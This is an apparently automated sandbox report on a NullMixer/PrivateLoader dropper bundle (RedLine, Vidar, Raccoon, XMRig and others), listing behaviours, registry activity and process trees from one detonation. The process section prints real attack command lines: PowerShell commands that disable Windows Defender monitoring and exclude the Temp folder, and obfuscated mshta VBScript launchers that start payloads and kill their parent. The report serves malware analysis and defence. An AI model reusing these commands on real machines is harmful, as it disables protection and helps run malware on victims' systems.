Malware Analysis Report

2024-11-15 09:03

Sample ID 241110-vy135avkbq
Target 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f
SHA256 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline media23 aspackv2 discovery dropper execution infostealer loader spyware stealer sectoprat chris fucker2 media20 rat trojan raccoon socelars media18 vidar xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral8, behavioral12, behavioral19, behavioral32, behavioral2, behavioral23, behavioral7, behavioral16, behavioral25, behavioral13, behavioral24, behavioral28, behavioral29, behavioral1, behavioral3, behavioral20, behavioral21, behavioral26, behavioral11, behavioral18, behavioral22, behavioral5, behavioral17, behavioral10, behavioral14, behavioral27, behavioral30, behavioral4, behavioral9, behavioral31, behavioral6, behavioral15 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f

Threat Level: Known bad

The file 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f was found to be: Known bad.

Malicious Activity Summary

Redline family

Privateloader family

Onlylogger family

Fabookie family

SectopRAT

Socelars family

xmrig

Vidar

Xmrig family

Raccoon family

Socelars payload

Vidar family

Detect Fabookie payload

SectopRAT payload

Raccoon Stealer V1 payload

Fabookie

NullMixer

RedLine

Sectoprat family

Nullmixer family

OnlyLogger

Gcleaner family

RedLine payload

Socelars

PrivateLoader

Raccoon

GCleaner

OnlyLogger payload

Vidar Stealer

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

ASPack v2.12-2.42

Drops Chrome extension

Looks up geolocation information via web service

Looks up external IP address via web service

Blocklisted process makes network request

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

NSIS installer

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Kills process with taskkill

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of UnmapMainImage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 17:25

Signatures

Privateloader family

privateloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (28 matching events, no description, indicator, process or target recorded)

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

5s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2264 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
PID 2264 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
PID 2264 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
PID 2684 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 3752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 3752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
PID 1536 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
PID 1536 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
PID 3828 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
PID 3828 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
PID 3828 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
PID 3288 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
PID 3288 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
PID 3288 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
PID 3608 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
PID 3608 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
PID 2348 wrote to memory of 4244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2348 wrote to memory of 4244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4692 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
PID 4692 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
PID 4692 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
PID 1152 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
PID 1152 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
PID 1152 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
PID 2872 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
PID 2872 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
PID 2872 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2684 -ip 2684

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 3076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 852

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 860

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 920

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 928

C:\Windows\SysWOW64\cmd.exe

